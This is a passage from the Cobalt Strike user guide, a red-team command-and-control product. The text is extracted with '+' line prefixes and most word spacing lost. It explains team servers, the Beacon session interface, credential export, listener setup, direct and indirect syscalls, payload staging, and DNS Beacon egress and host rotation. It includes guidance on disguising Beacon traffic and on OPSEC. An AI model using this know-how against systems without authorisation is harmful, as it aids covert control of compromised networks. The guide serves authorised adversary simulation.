+information.Selectoneoftheseteam serverprofilesfrom theleft-hand-sideofthe
+connectdialogtopopulatetheconnectdialogwithitsinformation.UsetheAlias Names
+andHost Namesbuttonstotogglehowthelistofhostsaredisplayed.Active
+connectionswillbedisplayedinbluetext.Youmaycontrolhowthehostlistisinitially
+displayed,activeconnectiontextcolor,andprunethelistthroughCobalt Strike ->
+Preferences ->Team Servers.
+Parameters:
+Alias- Enteranaliasforthehostorusethedefault.Thealiasnamecannotbeempty,
+startwithan'*',orusethesamealiasnameofanactiveconnection.
+Host- Specifyyourteam server’saddressintheHostfield.Thehostnamecannotbe
+empty.
+Port- DisplaysthedefaultPortfortheteam server(50050).Thisisrarelychange.The
+portcannotbeemptyandmustbeanumericnumber.
+User- TheUserfieldisyournicknameontheteam server.Changethistoyourcallsign,
+handle,ormade-uphackerfantasyname.Theusernamecannotbeempty.
+Password- Enterthesharedpasswordfortheteam server.
+3. PressConnecttoconnecttotheCobaltStriketeam server.
+Ifthisisyourfirstconnectiontothisteam server,CobaltStrikewillaskifyourecognize
+theSHA256hashofthisteam server.
+figure 5 - Verifyingtheserver’sSSLcertificate
+4. Ifyoudo,pressYes,andtheCobaltStrikeclientwillconnecttotheserverandopenthe
+clientuserinterface.
+CobaltStrikeUserGuide www.fortra.com page:22
+
+WelcometoCobaltStrike/DistributedandTeamOperations
+NOTE:
+CobaltStrikewillalsorememberthisSHA256hashforfutureconnections.Youmay
+managethesehashesthroughCobalt Strike -> Preferences -> Fingerprints.
+Distributed and Team Operations
+UseCobaltStriketocoordinateadistributedredteameffort.StageCobaltStrikeononeormore
+remotehosts.Startyourteamserversandhaveyourteamconnect.
+figure6-DistributedOperationswithCobaltStrike
+Onceconnectedtoateamserver,yourteamwill:
+l Usethesamesessions
+l Sharehosts,captureddata,anddownloadedfiles
+l Communicatethroughasharedeventlog.
+TheCobaltStrikeclientmayconnecttomultipleteamservers.GotoCobalt Strike ->New
+Connection toinitiateanewconnection.Whenconnectedtomultipleservers,aswitchbarwill
+showupatthebottomofyourCobaltStrikewindow.
+figure7-ServerSwitchbar
+CobaltStrikeUserGuide www.fortra.com page:23
+
+WelcometoCobaltStrike/ScriptingCobaltStrike
+ThisswitchbarallowsyoutoswitchbetweenactiveCobaltStrikeserverinstances.Eachserver
+hasitsownbutton.Right-clickabuttonandselectRenametomakethebutton’stextreflectthe
+roleoftheserverduringyourengagement.Theserverbuttonwilldisplaytheactivebuttonin
+boldtextandcolorbasedoncolorpreferencefoundinCobalt Strike -> Preferences ->
+TeamServerstobetterindicatewhichbuttonisactive.Thisbuttonnamewillalsoidentifythe
+serverintheCobaltStrikeActivityReport.
+Whenconnectedtomultipleservers,CobaltStrikeaggregateslistenersfromalloftheservers
+it’sconnectedto.Thisaggregationallowsyoutosendaphishingemailfromoneserverthat
+referencesamaliciouswebsitehostedonanotherserver.Attheendofyourengagement,
+CobaltStrike’sreportingfeaturewillqueryalloftheserversyou’reconnectedtoandmergethe
+datatotellonestory.
+Reconnecting the Client
+Whentheclientdisconnectionisuser-initiatedwiththeMenu,ToolbarorSwitchbarServer
+button,aredbannerdisplayswithaReconnectandClosebutton.
+PressClosetoclosethewindow.PressReconnecttoreconnecttotheTeamServer.
+IftheTeamServerisnotavailableadialogdisplaysaskingifyouwanttoretry(Yes/No).IfYes
+thenconnectionisattemptedagain(repeatsifneeded).IfNo,thedialogcloses.
+WhendisconnectionisinitiatedbytheTeamServerorothernetworkinterruptiontheredbanner
+willdisplayamessagewithacountdownforconnectionretry.Thiswillrepeatuntilaconnection
+ismadewiththeTeamServerortheuserclicksonClose.Inthiscasetheusercaninteractwith
+otherpartsoftheUI.
+Whentheclientreconnects,theredreconnectbardisappears.
+Scripting Cobalt Strike
+CobaltStrikeUserGuide www.fortra.com page:24
+
+WelcometoCobaltStrike/ScriptingCobaltStrike
+CobaltStrikeisscriptablethroughitsAggressorScriptlanguage.AggressorScriptallowsyouto
+modifyandextendtheCobaltStrikeclient.
+History
+AggressorScriptisthespiritualsuccessortoCortana,theopensourcescriptingenginein
+Armitage.CortanawasmadepossiblebyacontractthroughDARPA'sCyberFastTrack
+program.CortanaallowsitsuserstoextendArmitageandcontroltheMetasploit® Framework
+anditsfeaturesthroughArmitage'steamserver.CobaltStrike3.0isaground-uprewriteof
+CobaltStrikewithoutArmitageasafoundation.Thischangeaffordedanopportunitytorevisit
+CobaltStrike'sscriptingandbuildsomethingaroundCobaltStrike'sfeatures.Theresultofthis
+workisAggressorScript.
+AggressorScriptisascriptinglanguageforredteamoperationsandadversarysimulations
+inspiredbyscriptableIRCclientsandbots.Itspurposeistwo-fold.Youmaycreatelongrunning
+botsthatsimulatevirtualredteammembers,hackingside-by-sidewithyou.Youmayalsouseit
+toextendandmodifytheCobaltStrikeclienttoyourneeds.
+Loading Scripts
+AggressorScriptisbuiltintotheCobaltStrikeclient.Tomanagescripts,gotoCobalt Strike ->
+Script ManagerandpressLoad.
+figure8-ScriptManager
+AdefaultscriptinsideofCobaltStrikedefinesallofCobaltStrike’spopupmenusandformats
+informationdisplayedinCobaltStrike’sconsoles.ThroughtheAggressorScriptengine,you
+mayoverridethesedefaultsandcustomizeCobaltStriketoyourpreferences.
+YoumayalsouseAggressorScripttoaddnewfeaturestoCobaltStrike’sBeaconandto
+automatecertaintasks.
+TolearnmoreaboutAggressorScript,seeAggressor Script on page 186.
+CobaltStrikeUserGuide www.fortra.com page:25
+
+WelcometoCobaltStrike/RunningtheClientonMacOSX
+Running the Client on Mac OS X
+TheCobaltStrikeclientmaynotbeabletoshowcontentsoftheDocuments,Desktop,and
+Downloadsfoldersinthefilebrowserinitially.(e.g.loadingscripts,uploadingfiles,generating
+payloads,etc…)
+Bydefault,OSXlimitswhataccessapplicationshavetotheDocuments,Desktop,andDownload
+folders.Theseapplicationsneedtoexplicitlybegrantedaccesstothesefolders.
+SinceCobaltStrikeisathirdpartyapplication,itisn'tasstraightforwardasgrantingtheapp
+"CobaltStrike"access.YoumayneedtogivetheJRErunningCobaltStrikeclientaccesstothe
+filesystem.YoucangiveaccesstothespecificFilesandFoldersorFullDiskAccess.
+Youmaybepromptedfortheaccess:
+figure9-MacOSXAccessPrompt
+Or,iftheaccesshasbeenpreviouslydenied,youmayneedtoedittheaccessintheOSXSystem
+Preferences/Security&Privacy/Privacydialog:
+CobaltStrikeUserGuide www.fortra.com page:26
+
+WelcometoCobaltStrike/RunningtheClientonMacOSX
+figure10-OSXPrivacyDialog
+PleasebeadvisedthatotherapplicationsthatusetheJREwillalsohavethisaccess.
+NOTE:
+Thesamestepsmayalsoneedtobetakenfor'/bin/bash'.
+CobaltStrikeUserGuide www.fortra.com page:27
+
+UserInterface/Overview
+User Interface
+Overview
+TheCobaltStrikeuserinterfaceissplitintotwoparts.Thetopoftheinterfaceshowsa
+visualizationofsessionsortargets.ThebottomoftheinterfacedisplaystabsforeachCobalt
+Strikefeatureorsessionyouinteractwith.Youmayclicktheareabetweenthesetwopartsand
+resizethemtoyourliking.
+figure11-CobaltStrikeUserInterface
+Toolbar
+ThetoolbaratthetopofCobaltStrikeoffersquickaccesstocommonCobaltStrikefunctions.
+KnowingthetoolbarbuttonswillspeedupyouruseofCobaltStrikeconsiderably.
+Connecttoanotherteamserver
+Disconnectfromthecurrentteamserver
+CreateandeditCobaltStrike’slisteners
+ShowSessionsinGraphView
+CobaltStrikeUserGuide www.fortra.com page:28
+
+UserInterface/SessionandTargetVisualizations
+ShowSessioninTableView
+ShowTargetsinTableView
+ManageWebServer
+ViewCredentials
+ViewDownloadFiles
+ViewKeystrokes
+ViewScreenshots
+Session and Target Visualizations
+CobaltStrikehasseveralvisualizationseachdesignedtoaidadifferentpartofyour
+engagement.Youmayswitchbetweenvisualizationsthrough(PivotGraph,SessionTable,
+TargetTable)buttons onthetoolbarortheCobalt Strike ->Visualization menu.
+Pivot Graph
+CobaltStrikehastheabilitytolinkmultipleBeaconsintoachain.TheselinkedBeaconsreceive
+theircommandsandsendtheiroutputthroughtheparentBeaconintheirchain.Thistypeof
+chainingisusefultocontrolwhichsessionsegressanetworkandtoemulateadisciplinedactor
+whorestrictstheircommunicationpathsinsideofanetworktosomethingplausible.This
+chainingofBeaconsisoneofthemostpowerfulfeaturesinCobaltStrike.
+CobaltStrike’sworkflowsmakethischainingveryeasy.It’snotuncommonforCobaltStrike
+operatorstochainBeaconsfourorfivelevelsdeeponaregularbasis.Withoutavisualaidit’s
+verydifficulttokeeptrackofandunderstandthesechains.ThisiswherethePivotGraphcomes
+in.
+ThePivotGraphshowsyourBeaconchainsinanaturalway.EachBeaconsessionhasanicon.
+Aswiththesessionstable:theiconforeachhostindicatesitsoperatingsystem.Iftheiconis
+redwithlightningbolts,theBeaconisrunninginaprocesswithadministratorprivileges.A
+darkericonindicatesthattheBeaconsessionwasaskedtoexitanditacknowledgedthis
+command.
+ThefirewalliconrepresentstheegresspointofyourBeaconpayload.Adashed green line
+indicatestheuseofbeaconingHTTPorHTTPSconnectionstoleavethenetwork.Ayellow
+dashed line indicatestheuseofDNStoleavethenetwork.
+CobaltStrikeUserGuide www.fortra.com page:29
+
+UserInterface/SessionandTargetVisualizations
+figure12-CobaltStrikeGraphView
+AnarrowconnectingoneBeaconsessiontoanotherrepresentsalinkbetweentwoBeacons.
+CobaltStrike’sBeaconusesWindowsnamedpipesandTCPsocketstocontrolBeaconsinthis
+peer-to-peerfashion.Anorange arrow isanamedpipechannel.SSHsessionsuseanorange
+arrowaswell.Ablue arrow isaTCPsocketchannel.Ared (namedpipe)orpurple (TCP)arrow
+indicatesthataBeaconlinkisbroken.
+ClickaBeacontoselectit.YoumayselectmultipleBeaconsbyclickinganddraggingaboxover
+thedesiredhosts.PressCtrlandShiftandclicktoselectorunselectanindividualBeacon.
+Right-clickaBeacontobringupamenuwithavailablepost-exploitationoptions.
+SeveralkeyboardshortcutsareavailableinthePivotGraph.
+l Ctrl+Plus —zoom in
+l Ctrl+Minus —zoom out
+l Ctrl+0 —resetthezoom level
+l Ctrl+A —selectallhosts
+l Escape —clearselection
+l Ctrl+C —arrangehostsintoacircle
+l Ctrl+S —arrangehostsintoastack
+l Ctrl+H —arrangehostsintoahierarchy.
+Right-clickthePivotGraphwithnoselectedBeaconstoconfigurethelayoutofthisgraph.This
+menualsohasanUnlinkedmenu.SelectHide tohideunlinkedsessionsinthepivotgraph.
+SelectShow toshowunlinkedsessionsagain.
+Sessions Table
+CobaltStrikeUserGuide www.fortra.com page:30
+
+UserInterface/SessionandTargetVisualizations
+ThesessionstableshowswhichBeaconsarecallinghometothisCobaltStrikeinstance.
+BeaconisCobaltStrike’spayloadtoemulateadvancedthreatactors.Here,youwillseethe
+externalIPaddressofeachBeacon,theinternalIPaddress,theegresslistenerforthatBeacon,
+whentheBeaconlastcalledhome,andotherinformation.Nexttoeachrowisaniconindicating
+theoperatingsystemofthecompromisedtarget.Iftheiconisredwithlightningbolts,the
+Beaconisrunninginaprocesswithadministratorprivileges.Afadediconindicatesthatthe
+Beaconsessionwasaskedtoexitanditacknowledgedthiscommand.
+figure13-CobaltStrikeBeaconManagementTool
+IfyouuseaDNSBeaconlistener,beawarethatCobaltStrikewillnotknowanythingabouta
+hostuntilitchecksinforthefirsttime.Ifyouseeanentrywithalastcalltimeandthat’sit,you
+willneedtogivethatBeaconitsfirsttasktoseemoreinformation.
+Right-clickoneormoreBeacon’stoseeyourpost-exploitationoptions.
+Targets Table
+TheTargetsTableshowsthetargetsinCobaltStrike’sdatamodel.Thetargetstabledisplays
+theIPaddressofeachtarget,itsNetBIOSname,andanotethatyouoroneofyourteam
+membersassignedtothetarget.Theicontotheleftofatargetindicatesitsoperatingsystem.A
+rediconwithlightningboltsindicatesthatthetargethasaCobaltStrikeBeaconsession
+associatedwithit.
+figure14-CobaltStrikeTargetsView
+Clickanyofthetableheaderstosortthehosts.Highlightarowandright-clickittobringupa
+menuwithoptionsforthathost.PressCtrlandAltandclicktoselectanddeselectindividual
+hosts.
+Thetarget’stableisausefulforlateralmovementandtounderstandyourtarget’snetwork.
+CobaltStrikeUserGuide www.fortra.com page:31
+
+UserInterface/Tabs
+Tabs
+CobaltStrikeopenseachdialog,console,andtableinatab.ClicktheX buttontocloseatab.
+UseCtrl+D toclosetheactivetab.Ctrl+Shift+D willclosealltabsexcepttheactiveon.
+Youmayright-clicktheX buttontoopenatabinawindow,takeascreenshotofatab,orclose
+alltabswiththesamename.
+Keyboardshortcutsexistforthesefunctionstoo.UseCtrl+W toopentheactivetabinitsown
+window.UseCtrl+T toquicklysaveascreenshotoftheactivetab.
+Ctrl+B willsendthecurrenttabtothebottomoftheCobaltStrikewindow.Thisisusefulfortabs
+thatyouneedtoconstantlywatch.Ctrl+E willundothisactionandremovethetabatthe
+bottomoftheCobaltStrikewindow.
+HoldshiftandclickX toclosealltabswiththesamename.Holdshift+controlandclickX to
+openthetabinitsownwindow.
+UseCtrl+Left andCtrl+Right toquicklyswitchtabs.Youmaydraganddroptabstochange
+theirorder.
+TIP:
+ThefulllistofDefaultKeyboardShortcutsareavailablefromthemenu(Help -> Default
+Keyboard Shortcuts).
+Consoles
+CobaltStrikeprovidesaconsoletointeractwithBeaconsessions,scripts,andchatwithyour
+teammates.
+figure15-AConsoleTab
+CobaltStrikeUserGuide www.fortra.com page:32
+
+UserInterface/Tables
+Theconsolestrackyourcommandhistory.Usetheup arrow tocyclethroughpreviouslytyped
+commands.Thedown arrow movesbacktothelastcommandyoutyped.Thehistory
+commandlistspreviouslytypedcommands.The!commandallowspreviouslytyped
+commandstoberanagain.
+NOTE:
+Thelistofpreviouslytypedcommandsisnotmaintainedbetweensessions.Closinga
+consolewindowandthenreopeningitwillstartwithnopreviouslytypedcommands.
+UsetheTab keytocompletecommandsandparameters.
+UseCtrl+Plus tomaketheconsolefontsizelarger,Ctrl+Minus tomakeitsmaller,andCtrl+0
+toresetit.Thischangeislocaltothecurrentconsoleonly.VisitCobalt Strike ->Preferences to
+permanentlychangethefont.
+PressCtrl+F toshowapanelthatwillletyousearchfortextwithintheconsole.UseCtrl+A to
+selectalltextintheconsole’sbuffer.
+TIP:
+ThefulllistofDefaultKeyboardShortcutsareavailablefromthemenu(Help -> Default
+Keyboard Shortcuts).
+Tables
+CobaltStrikeusestablestodisplaysessions,credentials,targets,andotherengagement
+information.
+MosttablesinCobaltStrikehaveanoptiontoassignacolorhighlighttothehighlightedrows.
+ThesehighlightsarevisibletootherCobaltStrikeclients.Right-clickandlookfortheColor
+menu.
+PressCtrl+F withinatabletoshowthetablesearchpanel.Thisfeatureletsyoufilterthecurrent
+table.
+CobaltStrikeUserGuide www.fortra.com page:33
+
+UserInterface/KeyboardShortcuts
+figure16-TablewithSearchPanel
+Thetextfieldiswhereyoutypeyourfiltercriteria.Theformatofthecriteriadependsonthe
+columnyouchoosetoapplythefilterto.UseCIDR notation(e.g.,192.168.1.0/24)andhost
+ranges(192.168.1-192.169.200)tofiltercolumnsthatcontainaddresses.Usenumbersor
+rangesofnumbersforcolumnsthatcontainnumbers.Usewildcardcharacters(*,?)tofilter
+columnsthatcontainstrings.
+The! buttonnegatesthecurrentcriteria.Pressenter toapplythespecifiedcriteriatothecurrent
+table.Youmaystackasmanycriteriatogetherasyoulike.TheReset buttonwillremovethe
+filtersappliedtothecurrenttable.
+Keyboard Shortcuts
+Therearemanydefaultkeyboardshortcutsavailabletoyouwhenworkingintheuserinterface.
+SomecanbeusedanywherewhileothersarespecifictodifferentareasoftheUI.Fromthe
+menu,selectingHelp -> Default Keyboard Shortcutsopensthefollowingreferencedialog:
+CobaltStrikeUserGuide www.fortra.com page:34
+
+UserInterface/KeyboardShortcuts
+figure17-DefaultKeyboardShortcuts
+TheAggressorfunction,openDefaultShortcutsDialog,canalsobeusedtoopenthesamelist.
+CobaltStrikeUserGuide www.fortra.com page:35
+
+DataManagement/Overview
+Data Management
+Overview
+CobaltStrike’steamserverisabrokerforinformationcollectedbyCobaltStrikeduringyour
+engagement.CobaltStrikeparsesoutputfromitsBeaconpayloadtoextracttargets,services,
+andcredentials.
+Ifyou’dliketoexportCobaltStrike’sdata,youmaydosothroughReporting ->Export Data.
+CobaltStrikeprovidesoptionstoexportitsdataasTSVandXMLfiles.TheCobaltStrikeclient’s
+exportdatafeaturemergesdatafromalloftheteamserversyou’recurrentlyconnectedtoand
+exportTSVandXMLfileswithdatainCobaltStrike'sdatamodel..
+Targets
+YoumayinteractwithCobaltStrike’stargetinformationthroughView ->Targets.Thistab
+displaysthesameinformationastheTargetsVisualization.
+PressImport toimportafilewithtargetinformation.CobaltStrikeacceptsflattextfileswithone
+hostperline.ItalsoacceptsXMLfilesgeneratedbyNmap(the–oXoption).
+PressAdd toaddnewtargetstoCobaltStrike’sdatamodel.
+CobaltStrikeUserGuide www.fortra.com page:36
+
+DataManagement/Services
+figure18-AddaTarget
+ThisdialogallowsyoutoaddmultiplehoststoCobaltStrike’sdatabase.SpecifyarangeofIP
+addressesoruseCIDR notationintheAddressfieldtoaddmultiplehostsatonetime.Hold
+downshiftwhenyouclickSavetoaddhoststothedatamodelandkeepthisdialogopen.
+Selectoneormorehostsandright-clicktobringupthehostsmenu.Thismenuiswhereyou
+changethenoteonthehosts,settheiroperatingsysteminformation,orremovethehostsfrom
+thedatamodel.
+Services
+Fromatargetsdisplay,right-clickahost,andselectServices.ThiswillopenCobaltStrike’s
+servicesbrowser.Hereyoumaybrowseservices,assignnotestodifferentservices,andremove
+serviceentriesaswell.
+figure19-TheServicesDialog
+Credentials
+GotoView ->Credentials tointeractwithCobaltStrike’scredentialmodel.
+PressAdd toaddanentrytothecredentialmodel.Again,youmayholdshiftandpressSave to
+keepthedialogopenandmakeiteasiertoaddnewcredentialstothemodel.
+PressCopy tocopythehighlightedentriestoyourclipboard.
+UseExport toexportcredentialsinPWDumpformat.
+figure20-TheCredentialModel
+CobaltStrikeUserGuide www.fortra.com page:37
+
+DataManagement/Maintenance
+Maintenance
+CobaltStrike’sdatamodelkeepsallofitsstateandstatemetadatainthedata/folder.This
+folderexistsinthefolderyourantheCobaltStriketeamserverfrom.
+ToclearCobaltStrike’sdatamodel:stoptheteamserver,deletethedata/folder,andits
+contents.CobaltStrikewillrecreatethedata/folderwhenyoustarttheteamservernext.
+Ifyou’dliketoarchivethedatamodel,stoptheteamserver,anduseyourfavoriteprogramto
+storethedata/folderanditsfileselsewhere.Torestorethedatamodel,stoptheteamserver,
+andrestoretheoldcontenttothedata/folder.
+Reporting ->Reset Data resetsCobaltStrike’sDataModelwithoutateamserverrestart.
+Clearing Team Server Data
+Anewscripthasbeenaddedfortheteamserverwhichclearsthedataandstatefromthe
+TeamServertoreturnittoadefaultstate.Enterthefollowingcommand:
+./clearteamserverdata
+AwarningwilldisplayandyouwillhavetoenterCLEAR forthecommandtocontinue.
+Theerrorsshownaretobeexpectedwhenthefolderstobedeleteddonotexist.Inthiscase
+therearenodownloads,screenshotsoruploadsfolderssotheycouldnotbedeleted.Anyfiles
+offolderswhichcouldnotbedeletedwillbelisted.
+CobaltStrikeUserGuide www.fortra.com page:38
+
+ListenerandInfrastructureManagement/Overview
+Listener and Infrastructure
+Management
+Overview
+Thefirststepofanyengagementistosetupinfrastructure.InCobaltStrike’scase,
+infrastructureconsistsofoneormoreteamservers,redirectors,andDNSrecordsthatpointto
+yourteamserversandredirectors.Onceyouhaveateamserverupandrunning,youwillwant
+toconnecttoit,andconfigureittoreceiveconnectionsfromcompromisedsystems.Listeners
+areCobaltStrike’smechanismtodothis.
+AlistenerissimultaneouslyconfigurationinformationforapayloadandadirectiveforCobalt
+Striketostandupaservertoreceiveconnectionsfromthatpayload.Alistenerconsistsofa
+user-definedname,thetypeofpayload,andseveralpayload-specificoptions.
+Listener Management
+TomanageCobaltStrikelisteners,gotoCobalt Strike ->Listeners.Thiswillopenatablisting
+allofyourconfiguredpayloadsandlisteners.
+figure21-ListenerManagementTab
+PressAdd tocreateanewlistener.TheNewListenerpaneldisplays.
+CobaltStrikeUserGuide www.fortra.com page:39
+
+ListenerandInfrastructureManagement/ListenerManagement
+figure22-NewListenerPanel
+UsethePayloaddrop-downtoselectoneoftheavailablepayload/listenertypesyouwishto
+configure.Eachhasdifferentparametersandaredescribedinthefollowingsections:
+DNS Beacon on page 44
+HTTP Beacon and HTTPS Beacon on page 50
+SMB Beacon on page 56
+TCP Beacon on page 59
+CobaltStrikeUserGuide www.fortra.com page:40
+
+ListenerandInfrastructureManagement/CobaltStrike’sBeaconPayload
+External C2 on page 62
+Foreign Listeners on page 64
+Toeditalistener,highlightalistenerandpressEdit.Toremovealistener,highlightthelistener
+andpressRemove.
+Cobalt Strike’s Beacon Payload
+Mostcommonly,youwillconfigurelistenersforCobaltStrike’sBeaconpayload.Beaconis
+CobaltStrike’spayloadtomodeladvancedattackers.UseBeacontoegressanetworkover
+HTTP,HTTPS,orDNS.Youmayalsolimitwhichhostsegressanetworkbycontrollingpeer-to-
+peerBeaconsoverWindowsnamedpipesandTCPsockets.
+Beaconisflexibleandsupportsasynchronousandinteractivecommunication.Asynchronous
+communicationislowandslow.Beaconwillphonehome,downloaditstasks,andgotosleep.
+Interactivecommunicationhappensinreal-time.
+Beacon’snetworkindicatorsaremalleable.RedefineBeacon’scommunicationwithCobalt
+Strike’smalleableC2language.ThisallowsyoutocloakBeaconactivitytolooklikeother
+malwareorblend-inaslegitimatetraffic.SeeMalleable Command and Control on page 129
+formoreinformation.
+System Calls
+TheBeaconpayloadhasimplementedtheabilitytousesystemcallsinsteadofthestandard
+WindowsAPIfunctions.CurrentlyBeaconsupportsalimitedsetoffunctionsforthiscapability.
+Thefollowingfunctionssupporttheuseofsystemcalls:
+l CloseHandle
+l CreateFileMapping
+l CreateRemoteThread
+l CreateThread
+l DuplicateHandle
+l GetThreadContext
+l MapViewOfFile
+l OpenProcess
+l OpenThread
+l ReadProcessMemory
+CobaltStrikeUserGuide www.fortra.com page:41
+
+ListenerandInfrastructureManagement/CobaltStrike’sBeaconPayload
+l ResumeThread
+l SetThreadContext
+l UnmapViewOfFile
+l VirtualAlloc
+l VirtualAllocEx
+l VirtualFree
+l VirtualProtect
+l VirtualProtectEx
+l VirtualQuery
+l WriteProcessMemory
+WhenyougenerateastagelessbeaconpayloadfromtheCobaltStrikeUIorasupported
+aggressorfunction,youcanchoosewhichsystemcallmethodwillbeusedatexecutiontime.
+System Call Method Description
+None UsethestandardWindowsAPIfunction
+Direct UsetheNt*versionofthefunction
+Indirect JumptotheappropriateinstructionwithintheNt*
+versionofthefunction
+Therearesomecommandsandworkflowsthatinjectorspawnanewbeaconthatdonotallow
+youtosettheinitialsystemcallmethod.Inthesecases,settingthe‘stage.syscall_method’
+settingintheprofilewillallowyoutocontroltheinitialmethodusedatexecutiontime.
+Thefollowingcommandsandworkflowsusethestage.syscall_methodsetting:
+l elevate
+l inject
+l jump
+l spawn
+l spawnas
+l spawnu
+l team serverrespondingtoastagelesspayloadrequest
+l team serverrespondingtoanexternalc2payloadrequest
+Usethesyscall-method [method]commandtomodifywhichmethodwillbeusedfor
+subsequentcommands.Inaddition,syscall-methodwithoutanyargumentswillquerythe
+currentmethod.
+CobaltStrikeUserGuide www.fortra.com page:42
+
+ListenerandInfrastructureManagement/PayloadStaging
+Payload Security Features
+CobaltStriketakesstepstoprotectBeaconscommunicationandtoensurethataBeaconcan
+onlyreceivetasksfromandsendoutputtoitsteamserver.
+WhenyousetuptheBeaconpayloadforthefirsttime,CobaltStrikewillgeneratea
+public/privatekeypairthatisuniquetoyourteamserver.Theteamserver’spublickeyis
+embeddedintoBeacon’spayloadstage.Beaconusestheteamserver’spublickeytoencrypt
+sessionmetadatathatitsendstotheteamserver.
+Beaconmustalwayssendsessionmetadatabeforetheteamservercanissuetasksand
+receiveoutputfromtheBeaconsession.Thismetadatacontainsarandomsessionkey
+generatedbythatBeacon.TheteamserveruseseachBeacon’ssessionkeytoencrypttasks
+andtodecryptoutput.
+EachBeaconimplementationanddatachannelusesthissamescheme.Youhavethesame
+securitywiththeArecorddatachannelintheHybridHTTPandDNSBeaconasyoudowiththe
+HTTPSBeacon.
+BeawarethattheaboveappliestoBeacononceitisstaged.Thepayloadstagers,duetotheir
+size,donothavebuilt-insecurityfeatures.
+Payload Staging
+Onetopicthatdeservesmention,asbackgroundinformation,ispayloadingstaging.Many
+attackframeworksdecoupletheattackfromthestuffthattheattackexecutes.Thisstuffthat
+anattackexecutesisknownasapayload.Payloadsareoftendividedintotwoparts:thepayload
+stageandthepayloadstager.Astagerisasmallprogram,usuallyhand-optimizedassembly,
+thatdownloadsapayloadstage,injectsitintomemory,andpassesexecutiontoit.Thisprocess
+isknownasstaging.
+Thestagingprocessisnecessaryinsomeoffenseactions.Manyattackshavehardlimitson
+howmuchdatatheycanloadintomemoryandexecuteaftersuccessfulexploitation.This
+greatlylimitsyourpost-exploitationoptions,unlessyoudeliveryourpost-exploitationpayloadin
+stages.
+CobaltStrikedoesusestaginginitsuser-drivenattacks.Thesearemostoftheitemsunder
+PayloadsandAttacks.Thestagersusedintheseplacesdependonthepayloadpairedwiththe
+attack.Forexample,theHTTPBeaconhasanHTTPstager.TheDNSBeaconhasaDNSTXT
+recordstager.Notallpayloadshavestageroptions.Payloadswithnostagercannotbe
+deliveredwiththeseattackoptions.
+Ifyoudon’tneedpayloadstaging,youcanturnitoff.Setthehost_stage optioninyour
+MalleableC2profiletofalse.ThiswillpreventCobaltStrikefromhostingpayloadstagesonits
+CobaltStrikeUserGuide www.fortra.com page:43
+
+ListenerandInfrastructureManagement/DNSBeacon
+webandDNSservers.ThereisabigOPSECbenefittodoingthis.Withstagingon,anyonecan
+connecttoyourserver,requestapayload,andanalyzeitscontentstofindinformationfrom
+yourpayloadconfiguration.
+InCobaltStrike4.0andlater,post-exploitationandlateralmovementactionseschewstagers
+andopttodeliverafullpayloadwherepossible.Ifyoudisablepayloadstaging,youshouldn’t
+noticeitonceyou’rereadytodopost-exploitation.
+DNS Beacon
+TheDNSBeaconisafavoriteCobaltStrikefeature.ThispayloadusesDNSrequeststobeacon
+backtoyou.TheseDNSrequestsarelookupsagainstdomainsthatyourCobaltStriketeam
+serverisauthoritativefor.TheDNSresponsetellsBeacontogotosleeportoconnecttoyouto
+downloadtasks.TheDNSresponsewillalsotelltheBeaconhowtodownloadtasksfromyour
+teamserver.
+figure23-DNSBeaconinAction
+InCobaltStrike4.0andlater,theDNSBeaconisaDNS-onlypayload.ThereisnoHTTP
+communicationmodeinthispayload.Thisisachangefrompriorversionsoftheproduct.
+Data Channels
+Today,theDNSBeaconcandownloadtasksoverDNSTXTrecords,DNSAAAArecords,orDNS
+Arecords.Thispayloadhastheflexibilitytochangebetweenthesedatachannelswhileitson
+target.UseBeacon’smodecommandtochangethecurrentBeacon’sdatachannel.mode dns
+CobaltStrikeUserGuide www.fortra.com page:44
+
+ListenerandInfrastructureManagement/DNSBeacon
+istheDNSArecorddatachannel.mode dns6 istheDNSAAAArecordchannel.And,mode dns-
+txt istheDNSTXTrecorddatachannel.ThedefaultistheDNSTXTrecorddatachannel.
+BeawarethatDNSBeacondoesnotcheckinuntilthere’sataskavailable.Usethecheckin
+commandtorequestthattheDNSBeaconcheckinnexttimeitcallshome.
+DNS Listener Setup
+TocreateaDNSBeaconlistenerselectCobalt Strike -> Listenersonthemainmenuandpress
+theAddbuttonatthebottomoftheListenerstabdisplay.
+TheNewListenerpaneldisplays.
+CobaltStrikeUserGuide www.fortra.com page:45
+
+ListenerandInfrastructureManagement/DNSBeacon
+figure24-DNSBeaconOptions
+SelectBeacon DNSasthePayloadtypeandgivethelisteneraName.Makesuretogivethe
+newlisteneramemorablenameasthisnameishowyouwillrefertothislistenerthrough
+CobaltStrike’scommandsandworkflows.
+Parameters
+CobaltStrikeUserGuide www.fortra.com page:46
+
+ListenerandInfrastructureManagement/DNSBeacon
+DNS Hosts-Press[+] toaddoneormoredomainstobeaconto.YourCobaltStrike
+teamserversystemmustbeauthoritativeforthedomainsyouspecify.Createa
+DNSArecordandpointittoyourCobaltStriketeamserver.UseDNSNSrecords
+todelegateseveraldomainsorsub-domainstoyourCobaltStriketeamserver’sA
+record.
+Thelengthofthebeaconhostlistinbeaconpayloadislimitedto255characters.
+ThisincludesarandomlyassignedURIforeachhostanddelimitersbetween
+eachiteminthelist.Ifthelengthisexceeded,hostswillbedroppedfromtheend
+ofthelistuntilitfitsinthespace.Therewillbemessagesintheteamserverlog
+fordroppedhosts.
+Host Rotation Strategy-Thisvalueconfiguresthebeaconsbehaviorforchoosing
+whichhost(s)fromthelisttouseforegress.Selectoneofthefollowing:
+round-robin:Selecttoloopthroughthelistofhostnamesintheordertheyare
+provided.Eachhostisusedforoneconnection.
+random:Selecttorandomlyselectahostnamefromthelisteachtimea
+connectionisattempted.
+failover-xx:Selecttouseaworkinghostaslongaspossible.Useeachhostinthe
+listuntiltheyreachaconsecutivefailovercount(x)ordurationtimeperiod
+(m,h,d),thenusethenexthost.
+rotate-xx:Selecttouseeachhostforaperiodoftime.Useeachhostinthelistfor
+thespecifiedduration(m,h,d),thenusethenexthost.
+Max Retry Stategy-Thisconfiguresthebeaconsbehaviorforexitingafteranumberof
+consecutivefailedconnectionattemptstotheTeamServer.Thereareseveral
+defaultoptionstochoosefromoryoucancreateyourownlistwiththe
+LISTENER_MAX_RETRY_STRATEGIEShook.SeeLISTENER_MAX_RETRY_
+STRATEGIES on page 227.
+none:Selecttoensurebeaconwillnotexitbecauseoffailedconnectionattempts.
+exit-xxx:Thesesettingsusethesyntaxofexit-[max_attempts]-[increase_
+attempts]-[duration][m,h,d].Themax_attemptvalueisthenumberof
+consecutivefailedattemptsbeforebeaconwillexit.Theincrease_attemptsis
+thenumberofconsecutivefailedattemptsbeforeincreasingthesleeptime.
